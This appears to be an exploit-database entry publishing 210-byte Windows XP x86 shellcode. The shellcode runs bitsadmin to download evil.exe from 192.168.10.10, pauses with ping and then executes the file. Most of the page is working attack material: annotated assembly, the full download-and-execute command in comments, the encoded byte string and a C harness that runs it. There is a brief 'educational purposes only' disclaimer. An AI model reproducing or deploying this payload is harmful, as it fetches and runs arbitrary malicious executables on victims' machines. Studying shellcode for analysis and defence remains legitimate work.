Windows/x86 bitsadmin download and execute (http://192.168.10.10/evil.exe "c:evil.exe") shellcode (210 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-06-27 | Type : shellcode | Platform : windows_x86
This exploit / vulnerability Windows/x86 bitsadmin download and execute (http://192.168.10.10/evil.exe "c:evil.exe") shellcode (210 bytes) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

/*
; Shellcode Title : bitsadmin download and execute
; Shellcode Author : Joseph McDonagh
; Date June 26, 2019
; Shellcode Length 210
; However, if the application you are exploiting already loads it, then all you need ...
; ... is the System Call and ExitProcess in kernel32.dll
; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
; ... relatively slow bitsadmin.exe program
; Tested on Windows XP SP2
; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
; after reading iamroot blog
; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
;
; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe


xor eax, eax ;Get the msvcrt.dll
mov ax, 0x7472 ;"tr\0\0"
push eax
push dword 0x6376736d ;"cvsm"
push esp

; LoadLibrary
mov ebx, 0x7c801d77 ;Address of function LoadLibraryA (winxp)
call ebx
mov ebp, eax ;msvcrt.dll is saved in ebp

xor eax, eax
push eax

push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x5c3a6320 ; \:c
push 0x632f2065 ; c/ e
push 0x78652e64 ; xe.d
push 0x6d632026 ; mc &
push 0x2620312e ; & 1.
push 0x302e302e ; 0.0.
push 0x37323120 ; 721
push 0x3033206e ; 03 n
push 0x2d20676e ; - gn
push 0x69702026 ; ip &
push 0x26202265 ; & "e
push 0x78652e6c ; xe.l
push 0x6976655c ; ive\
push 0x3a632220 ; :c"
push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x2f30312e ; /01.
push 0x30312e38 ; 01.8
push 0x36312e32 ; 61.2
push 0x39312f2f ; 91//
push 0x3a707474 ; :ptt
push 0x68202230 ; h "0
push 0x33626f6a ; 3boj
push 0x6e222072 ; n" r
push 0x6566736e ; efsn
push 0x6172742f ; art/
push 0x20657865 ; exe
push 0x2e6e696d ; .nim
push 0x64617374 ; dast
push 0x69622074 ; ib t
push 0x72617473 ; rats

mov edi,esp
push edi
mov eax, 0x77c293c7
call eax

xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax

*/

char code[]=

"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}